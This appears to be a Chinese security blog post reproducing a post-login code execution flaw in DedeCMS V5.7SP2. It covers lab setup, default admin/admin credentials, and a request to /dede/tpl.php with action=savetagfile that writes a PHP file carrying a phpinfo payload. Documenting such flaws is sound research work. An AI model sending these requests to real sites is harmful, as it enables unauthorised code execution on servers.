DedeCMS-V5.7SP2后台代码执行漏洞复现

发表于2020-09-28|更新于2022-09-18|漏洞复现

|字数总计:164|阅读时长:1分钟

环境搭建

安装什么很简单就设置一个数据库密码就不多说了
我用的服务器是phpstudy
下载地址xp.cn
DedeCMS-V5.7SP2官方下载地址http://dedecms.com/products/dedecms/downloads/
我在官方下载的出来的保存在蓝奏云地址https://wwa.lanzous.com/i8zW7h12t9i

漏洞复现

登录后台在/dede/文件里面
默认用户admin密码是admin

登录成功

在访问这个地址

1	访问域名 + /dede/tpl.php?action=upload

查看一下token源代码

写入恶意脚本

1 2	访问域名 + /dede/tpl.php?filename=secquan.lib.php&action=savetagfile&content=<?php%20phpinfo();?>&token=

文章作者: W啥都学

文章链接: https://zhao-sai-sai.github.io.git/2020/09/28/DedeCMS-V5.7SP2%E5%90%8E%E5%8F%B0%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 ZSSのW啥都学！

打赏

微信
支付宝

相关推荐

CVE-2012-2122Mysql身份认证漏洞及利用复现

MetInfo4.0任意用户密码修改漏洞复现

Office漏洞复现CVE-2017-11882

OpenSSH 漏洞复现用户名枚举漏洞(CVE-2018-15473)

OpenVAS的使用

phpstudy解析漏洞复现

评论

本地搜索